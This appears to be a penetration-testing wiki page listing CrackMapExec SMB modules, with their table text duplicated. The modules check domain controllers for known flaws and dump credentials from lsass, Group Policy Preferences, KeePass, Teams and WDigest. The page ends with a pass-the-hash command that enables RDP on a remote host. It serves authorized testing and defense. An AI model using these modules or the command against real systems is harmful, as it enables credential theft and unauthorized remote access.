🟢SMB Modules

CrackMapExec Modules to attack SMB Protocol.

PreviousSMB CrackMapExec Nextmet_inject

Last updated 1 year ago

SMB Module	Description
ZeroLogon	Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
Petitpotam	Module to check if the DC is vulnerable to PetitPotam, credit to @topotam
ms17-010	MS17-010, /!\ not tested oustide home lab
dfscoerce	Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam
nopac	Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
shadowcoerce	Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam

SMB Module

Description

ZeroLogon

Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472

Petitpotam

Module to check if the DC is vulnerable to PetitPotam, credit to @topotam

ms17-010

MS17-010, /!\ not tested oustide home lab

dfscoerce

Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam

nopac

Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

shadowcoerce

Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam

Module	Description
gpp_autologin	Searches the domain controller for registry.xml to find autologon information and returns the username and password.
gpp_password	Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
handlekatz	Get lsass dump using handlekatz64 and parse the result with pypykatz
hash_spider	Dump lsass recursively from a given hash using BH to find local admins
keepass_discover	Search for KeePass-related files and process.
keepass_trigger	Set up a malicious KeePass trigger to export the database in cleartext.
lsassy	Dump lsass and parse the result remotely with lsassy
masky	Remotely dump domain user credentials via an ADCS and a KDC
teams_localdb	Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process
wdigest	Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1
wireless	Get key of all wireless interfaces

Module

Description

gpp_autologin

Searches the domain controller for registry.xml to find autologon information and returns the username and password.

gpp_password

Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

handlekatz

Get lsass dump using handlekatz64 and parse the result with pypykatz

hash_spider

Dump lsass recursively from a given hash using BH to find local admins

keepass_discover

Search for KeePass-related files and process.

keepass_trigger

Set up a malicious KeePass trigger to export the database in cleartext.

lsassy

Dump lsass and parse the result remotely with lsassy

masky

Remotely dump domain user credentials via an ADCS and a KDC

teams_localdb

Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process

wdigest

Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1

wireless

Get key of all wireless interfaces

crackmapexec smb 10.9.20.13 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:7574cbf9d92c39d1d4dccd7b89301d2f' -x 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

🟢SMB Modules

🟢SMB Modules

Vulnerabilities

Credentials

Remote Code Execution

Activate RDP on the remote Host

Vulnerabilities

Credentials

Remote Code Execution

Activate RDP on the remote Host